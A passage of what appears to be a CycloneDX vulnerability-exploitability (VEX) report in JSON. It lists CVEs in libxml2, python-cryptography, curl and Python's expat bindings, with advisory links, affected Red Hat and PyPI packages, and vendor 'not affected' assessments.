          "url": "https://avd.aquasec.com/nvd/cve-2026-6732"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:11503"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6732"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461300"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1097"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/merge_requests/411"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6732"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8460-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6732"
        }
      ],
      "published": "2026-04-23T23:16:16+00:00",
      "updated": "2026-06-30T20:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-69247",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "cwes": [
        208,
        209
      ],
      "description": "cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. From 44.0.0 until 50.0.0, pkcs7_decrypt_der, pkcs7_decrypt_pem, and pkcs7_decrypt_smime reported the outcome of decrypting a RecipientInfo's encryptedKey in several distinguishable ways, one of which disclosed the exact length recovered from the RSA operation. The same distinction was also observable by timing. An application that decrypts attacker-supplied EnvelopedData and reflects the outcome gives the attacker a Bleichenbacher oracle against the content-encryption key. Decryption ran as RSA PKCS#1 v1.5 decrypt of encryptedKey, build an AES cipher from the result, then AES-CBC decrypt and PKCS#7 unpad. Invalid RSA padding, a valid padding with a bad key length, a correct length with a wrong key, and the real key each failed or succeeded differently. Case 1 is reachable only where the linked library lacks implicit rejection: OpenSSL 3.0 and 3.1, LibreSSL, and BoringSSL. Exploitation requires a service that auto-decrypts untrusted EnvelopedData matching the victim certificate and answers adaptively at high volume, such as an S/MIME gateway or mail filter. This issue is fixed in 50.0.0.",
      "recommendation": "Upgrade cryptography to version 50.0.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-69247"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/53fccd93413a8d7f07d6d8999681f27b75cffa3f"
        },
        {
          "url": "https://github.com/pyca/cryptography/pull/15369"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-g6cj-pr64-35w5"
        }
      ],
      "published": "2026-08-03T22:16:52+00:00",
      "updated": "2026-08-04T15:16:43+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-69248",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "cwes": [
        295
      ],
      "description": "cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 49.0.0, if an intermediate constrained CA permits the DNS name foo.example.com, and the leaf certificate has a wildcard in its DNS SAN of *.example.com, python-cryptography's verifier accepts which allows escaping outside of the permitted names. The core issue is in DNSConstraint::matches, where a wildcard pattern was treated as matching a more-specific permitted constraint even though *.example.com can expand to sibling names such as bar.example.com outside foo.example.com. This allows acceptance of an invalid certificate chain. This issue is fixed in 49.0.0.",
      "recommendation": "Upgrade cryptography to version 49.0.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-69248"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/4d035a4225965edeffd312079a510ef25fcfdcb2"
        },
        {
          "url": "https://github.com/pyca/cryptography/pull/14888"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-m2h6-j472-rp4c"
        }
      ],
      "published": "2026-08-03T22:16:52+00:00",
      "updated": "2026-08-04T16:16:28+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-69249",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "cwes": [
        400
      ],
      "description": "python-cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 49.0.0, when resolving invalid certificate chains that include duplicate copies of self-signed certificates, the processing recursively invokes the same candidate, leading to an exponential blowup. Although the limitation that the chain depth cannot exceed a specified maximum depth prevents unbounded recursion and guarantees termination, an attacker-controlled certificate chain can lead the processing to easily take more than 5s to reject in testing. This amplification could form the basis for a resource exhaustion denial of service attack. The core issue arises in the recursive nature of build_chain_inner, which does not de-duplicate against previously analyzed candidates. As the correctness of validation is not affected, the integrity of a system cannot be compromised through this vector, only its availability. This issue is fixed in 49.0.0.",
      "recommendation": "Upgrade cryptography to version 49.0.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-69249"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/4a12cf49675a184e47f912b00b04f3a629283582"
        },
        {
          "url": "https://github.com/pyca/cryptography/pull/14960"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-jwv3-5hgf-82ww"
        }
      ],
      "published": "2026-08-03T22:16:52+00:00",
      "updated": "2026-08-04T15:16:43+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-7168",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        294
      ],
      "description": "Successfully using libcurl to do a transfer over a specific HTTP proxy\n(`proxyA`) with **Digest** authentication and then changing the proxy host to\na second one (`proxyB`) for a second transfer, reusing the same handle, makes\nlibcurl wrongly pass on the `Proxy-Authorization:` header field meant for\n`proxyA`, to `proxyB`.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-7168"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/14"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-7168"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-7168.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-7168.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-v92m-hrhj-gw54"
        },
        {
          "url": "https://hackerone.com/reports/3697719"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7168"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-7168"
        }
      ],
      "published": "2026-05-13T13:01:57+00:00",
      "updated": "2026-06-17T11:01:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-7210",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        331
      ],
      "description": "`xml.parsers.expat` and `xml.etree.ElementTree` use insufficient entropy for Expat hash-flooding protection, which allows a crafted XML document to trigger hash flooding.\\r\\n\\r\\nFully mitigating this vulnerability requires both updating libexpat to 2.8.0 or later and applying this patch.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-7210"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/05/11/13"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/05/11/8"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-7210"
        },
        {
          "url": "https://github.com/python/cpython/commit/24b8f12544468e4cedf5bfbe25442fcd495391e4"
        },
        {
          "url": "https://github.com/python/cpython/commit/3573b3b1ecbd99030a0b18658e1bfece771b2566"
        },
        {
          "url": "https://github.com/python/cpython/commit/cbaecf9f16da611a646d507c1cbca265c588fc56"
        },
        {
          "url": "https://github.com/python/cpython/commit/e37df2a6a71d6538698e2d3188a7c345b827640b"
        },
        {
          "url": "https://github.com/python/cpython/commit/ea70712d1a8508e14e9677d44f838dab04dc0286"
        },
        {
          "url": "https://github.com/python/cpython/commit/eeea765cb9d8f1fc3d8918b272ac3c477983f27a"
        },
        {
          "url": "https://github.com/python/cpython/commit/fc9b11ff49cbc82e6f917d07a61517a2b5f3145f"
        },
        {
          "url": "https://github.com/python/cpython/issues/149018"
        },
        {
          "url": "https://github.com/python/cpython/pull/149023"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/PNY5OMBDPM2FRUZTWFFPJ6LISWKV627K/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7210"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-7210"
        }
      ],
      "published": "2026-05-11T18:16:42+00:00",
      "updated": "2026-08-14T01:19:08+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
